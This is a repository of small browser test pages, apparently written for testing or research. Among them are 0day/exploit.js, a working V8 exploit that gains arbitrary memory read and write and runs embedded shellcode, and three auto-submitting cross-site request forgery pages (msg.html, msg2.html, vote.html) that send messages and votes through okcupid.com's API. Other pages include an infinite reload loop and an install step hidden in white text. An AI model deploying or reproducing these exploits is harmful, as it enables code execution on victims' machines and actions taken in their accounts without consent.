├── 0day
    ├── exploit.html
    └── exploit.js
├── README.md
├── 2.js
├── reload.html
├── 3.html
├── todo.txt
├── 1.html
├── isBrave.html
├── pollution.html
├── brave2.html
├── 2.html
├── ios.html
├── papers.goggles
├── msg.html
├── brave.html
├── vote.html
├── msg2.html
└── LICENSE


/0day/exploit.html:
--------------------------------------------------------------------------------
1 | <script src="exploit.js"></script>
2 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # html-tests
2 | 
3 | some html pages for fun
4 | 


--------------------------------------------------------------------------------
/2.js:
--------------------------------------------------------------------------------
1 | third.innerText = 'This line only appears when a js file is executed.'
2 | 


--------------------------------------------------------------------------------
/reload.html:
--------------------------------------------------------------------------------
1 | <script>
2 |   while(true) {
3 |     window.location.reload();
4 |   }
5 | </script>
6 | 


--------------------------------------------------------------------------------
/3.html:
--------------------------------------------------------------------------------
1 | <a href="javascript:window.close(self);">window.close</a>
2 | <a href="javascript:alert(1);">alert</a>
3 | 


--------------------------------------------------------------------------------
/todo.txt:
--------------------------------------------------------------------------------
1 | 1. go to https://reddit.com and click on a cool link
2 | 2. navigate to https://testsafebrowsing.appspot.com/s/phishing.html
3 | 


--------------------------------------------------------------------------------
/1.html:
--------------------------------------------------------------------------------
1 | <a href='2.html' target='_blank'>click me to open a new tab</a>
2 | <br>
3 | <a href='2.html'>click me to navigate the current tab</a>
4 | 


--------------------------------------------------------------------------------
/isBrave.html:
--------------------------------------------------------------------------------
1 | <body>
2 |   <div id='result'>
3 |   </div>
4 |   <script>
5 |     result.innerText = JSON.stringify(navigator.brave)
6 |   </script>
7 | </body>
8 | 


--------------------------------------------------------------------------------
/pollution.html:
--------------------------------------------------------------------------------
 1 | <html>
 2 |   <head>
 3 |     <script>
 4 |       let i = 0;
 5 |       Array.prototype.push = (arg) => {
 6 |         console.log('polluted', arg, i);
 7 |         i = i + 1;
 8 |       };
 9 |     </script>
10 |   </head>
11 | </html>
12 | 


--------------------------------------------------------------------------------
/brave2.html:
--------------------------------------------------------------------------------
1 | <html>
2 |   <head>
3 |     <title>how to download Brave Nightly</title>
4 |   </head>
5 |   <body>
6 |     <p>click <a href="https://github.com/diracdeltas/html-tests/releases/download/0.0.1/BraveBrowserNightly-142.1.86.0.dmg">here</a> to download Brave for MacOS.</p>
7 |   </body>
8 | </html>
9 | 


--------------------------------------------------------------------------------
/2.html:
--------------------------------------------------------------------------------
 1 | <html>
 2 |   <body>
 3 |     <div id='first'>This line always appears.</div>
 4 |     <div id='second'></div>
 5 |     <div id='third'></div>
 6 |     <noscript><p>This only appears when noscript tags are executed.</p></noscript>
 7 |     <script>
 8 |       second.innerText = 'This line only appears with inline scripts.'
 9 |     </script>
10 |     <script src='2.js'></script>
11 |   </body>
12 | </html>
13 | 


--------------------------------------------------------------------------------
/ios.html:
--------------------------------------------------------------------------------
 1 | <html><body>
 2 |   Actual source code of this page:
 3 |   <div id='r' style='color: red;'></div>
 4 |   <a href="https://raw.githubusercontent.com/diracdeltas/html-tests/main/ios.html">Click to see the expected source code of this page</a>
 5 |   <script>
 6 |     setTimeout(() => {
 7 |       r.innerText = new XMLSerializer().serializeToString(document);
 8 |     }, 1000);
 9 |   </script>
10 | </body></html>
11 | 


--------------------------------------------------------------------------------
/papers.goggles:
--------------------------------------------------------------------------------
 1 | ! name: Scientific Papers by Citations
 2 | ! description: Prioritize scientific paper results sorted by citations
 3 | ! public: true
 4 | ! author: diracdeltas
 5 | 
 6 | $discard
 7 | $boost=4,site=scholar.google.com
 8 | $boost=3,site=semanticscholar.org
 9 | $boost=3,site=researchgate.net
10 | $boost=2,site=sciencedirect.com
11 | $boost=2,site=ncbi.nlm.nih.gov
12 | $boost=2,site=onlinelibrary.wiley.com
13 | 
14 | /citations|cited by/i$boost=2
15 | 


--------------------------------------------------------------------------------
/msg.html:
--------------------------------------------------------------------------------
 1 | <html>
 2 |   <body>
 3 |     <form id="form" method="post" action="https://www.okcupid.com/1/apitun/messages/send" enctype="text/plain">
 4 |       <input style='display:none' name='{"foo":"' value='", "receiverid":"9589131878323618423", "body":"i am a rabbit", "source":"desktop_global", "service":"other"}'>
 5 |       <input type="submit" value="Click me">
 6 |     </form>
 7 |     <script>
 8 |       window.onload = () => {form.submit()}
 9 |     </script>
10 |   </body>
11 | </html>
12 | 


--------------------------------------------------------------------------------
/brave.html:
--------------------------------------------------------------------------------
 1 | <html>
 2 |   <head>
 3 |     <title>how to download Brave Beta</title>
 4 |   </head>
 5 |   <body>
 6 |     <p>instructions:</p>
 7 |     <p style="color: blue;">1. go to https://brave.com/download-beta/</p>
 8 |     <p style="color: red;">2. click the button starting with "Get Beta ..." and wait for the download to finish</p>
 9 |     <p style="color: white;">3. go to https://chromewebstore.google.com/detail/open-in-brave-browser/mgmnomlncpmfgelhofilonnecmbdaoia?hl=en-US and click 'add to Brave'</p>
10 |   </body>
11 | </html>
12 | 


--------------------------------------------------------------------------------
/vote.html:
--------------------------------------------------------------------------------
 1 | <html>
 2 |   <body>
 3 |     <form id="form" method="post" action="https://www.okcupid.com/1/apitun/locals/vote" enctype="text/plain">
 4 |       <input style='display:none' name='{"foo":"' value='", "votes":[{"cardType":"user","id":"9589131878323618423","voteValue":"yes","subjectId":"9589131878323618423","user_data":"5hUNHHuWCw6athzyhP4TVpvmTnvNWUsCMgca6BQxjPJ//ryjQpDytxDZUOarA9AqA1otqcKaB0ZpkmCFp6syLrNEiLC/cYPgn/hcsskOu9Y="}]}'>
 5 |       <input type="submit" value="Click me">
 6 |     </form>
 7 |     <script>
 8 |       window.onload = () => {form.submit()}
 9 |     </script>
10 |   </body>
11 | </html>
12 | 


--------------------------------------------------------------------------------
/msg2.html:
--------------------------------------------------------------------------------
 1 | <html>
 2 |   <body>
 3 |     <form id="form" method="post" action="https://www.okcupid.com/1/apitun/messages/send" enctype="text/plain">
 4 |       <input id='input' style='display:none' name='{"foo":"' value='", "receiverid":"8882681663959697980", "body":"i got hacked by azuki the rabbit at TIME.", "source":"desktop_global", "service":"other"}'>
 5 |       <input type="submit" value="Click me">
 6 |     </form>
 7 |     <script>
 8 |       window.onload = () => {
 9 |         input.value = input.value.replace('TIME', new Date())
10 |         form.submit()
11 |       }
12 |     </script>
13 |   </body>
14 | </html>
15 | 


--------------------------------------------------------------------------------
/LICENSE:
--------------------------------------------------------------------------------
 1 | MIT License
 2 | 
 3 | Copyright (c) 2020 yan
 4 | 
 5 | Permission is hereby granted, free of charge, to any person obtaining a copy
 6 | of this software and associated documentation files (the "Software"), to deal
 7 | in the Software without restriction, including without limitation the rights
 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
 9 | copies of the Software, and to permit persons to whom the Software is
10 | furnished to do so, subject to the following conditions:
11 | 
12 | The above copyright notice and this permission notice shall be included in all
13 | copies or substantial portions of the Software.
14 | 
15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21 | SOFTWARE.
22 | 


--------------------------------------------------------------------------------
/0day/exploit.js:
--------------------------------------------------------------------------------
  1 | /*
  2 | BSD 2-Clause License
  3 | Copyright (c) 2021, rajvardhan agarwal
  4 | All rights reserved.
  5 | Redistribution and use in source and binary forms, with or without
  6 | modification, are permitted provided that the following conditions are met:
  7 | 1. Redistributions of source code must retain the above copyright notice, this
  8 |    list of conditions and the following disclaimer.
  9 | 2. Redistributions in binary form must reproduce the above copyright notice,
 10 |    this list of conditions and the following disclaimer in the documentation
 11 |    and/or other materials provided with the distribution.
 12 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
 13 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 14 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
 15 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
 16 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 17 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
 18 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
 19 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
 20 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
 21 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
 22 | */
 23 | 
 24 | var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11])
 25 | var wasm_mod = new WebAssembly.Module(wasm_code);
 26 | var wasm_instance = new WebAssembly.Instance(wasm_mod);
 27 | var f = wasm_instance.exports.main;
 28 | 
 29 | var buf = new ArrayBuffer(8);
 30 | var f64_buf = new Float64Array(buf);
 31 | var u64_buf = new Uint32Array(buf);
 32 | let buf2 = new ArrayBuffer(0x150);
 33 | 
 34 | function ftoi(val) {
 35 |     f64_buf[0] = val;
 36 |     return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
 37 | }
 38 | 
 39 | function itof(val) {
 40 |     u64_buf[0] = Number(val & 0xffffffffn);
 41 |     u64_buf[1] = Number(val >> 32n);
 42 |     return f64_buf[0];
 43 | }
 44 | 
 45 | const _arr = new Uint32Array([2**31]);
 46 | 
 47 | function foo(a) {
 48 |     var x = 1;
 49 | 	x = (_arr[0] ^ 0) + 1;
 50 | 
 51 | 	x = Math.abs(x);
 52 | 	x -= 2147483647;
 53 | 	x = Math.max(x, 0);
 54 | 
 55 | 	x -= 1;
 56 | 	if(x==-1) x = 0;
 57 | 
 58 | 	var arr = new Array(x);
 59 | 	arr.shift();
 60 | 	var cor = [1.1, 1.2, 1.3];
 61 | 
 62 | 	return [arr, cor];
 63 | }
 64 | 
 65 | for(var i=0;i<0x3000;++i)
 66 |     foo(true);
 67 | 
 68 | var x = foo(false);
 69 | var arr = x[0];
 70 | var cor = x[1];
 71 | 
 72 | const idx = 6;
 73 | arr[idx+10] = 0x4242;
 74 | 
 75 | function addrof(k) {
 76 |     arr[idx+1] = k;
 77 |     return ftoi(cor[0]) & 0xffffffffn;
 78 | }
 79 | 
 80 | function fakeobj(k) {
 81 |     cor[0] = itof(k);
 82 |     return arr[idx+1];
 83 | }
 84 | 
 85 | var float_array_map = ftoi(cor[3]);
 86 | 
 87 | var arr2 = [itof(float_array_map), 1.2, 2.3, 3.4];
 88 | var fake = fakeobj(addrof(arr2) + 0x20n);
 89 | 
 90 | function arbread(addr) {
 91 |     if (addr % 2n == 0) {
 92 |         addr += 1n;
 93 |     }
 94 |     arr2[1] = itof((2n << 32n) + addr - 8n);
 95 |     return (fake[0]);
 96 | }
 97 | 
 98 | function arbwrite(addr, val) {
 99 |     if (addr % 2n == 0) {
100 |         addr += 1n;
101 |     }
102 |     arr2[1] = itof((2n << 32n) + addr - 8n);
103 |     fake[0] = itof(BigInt(val));
104 | }
105 | 
106 | function copy_shellcode(addr, shellcode) {
107 |     let dataview = new DataView(buf2);
108 |     let buf_addr = addrof(buf2);
109 |     let backing_store_addr = buf_addr + 0x14n;
110 |     arbwrite(backing_store_addr, addr);
111 | 
112 |     for (let i = 0; i < shellcode.length; i++) {
113 |         dataview.setUint32(4*i, shellcode[i], true);
114 |     }
115 | }
116 | 
117 | var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + 0x68n));
118 | console.log("[+] Address of rwx page: " + rwx_page_addr.toString(16));
119 | var shellcode = [3833809148,12642544,1363214336,1364348993,3526445142,1384859749,1384859744,1384859672,1921730592,3071232080,827148874,3224455369,2086747308,1092627458,1091422657,3991060737,1213284690,2334151307,21511234,2290125776,1207959552,1735704709,1355809096,1142442123,1226850443,1457770497,1103757128,1216885899,827184641,3224455369,3384885676,3238084877,4051034168,608961356,3510191368,1146673269,1227112587,1097256961,1145572491,1226588299,2336346113,21530628,1096303056,1515806296,1497454657,2202556993,1379999980,1096343807,2336774745,4283951378,1214119935,442,0,2374846464,257,2335291969,3590293359,2729832635,2797224278,4288527765,3296938197,2080783400,3774578698,1203438965,1785688595,2302761216,1674969050,778267745,6649957];
120 | copy_shellcode(rwx_page_addr, shellcode);
121 | f();
122 | 


--------------------------------------------------------------------------------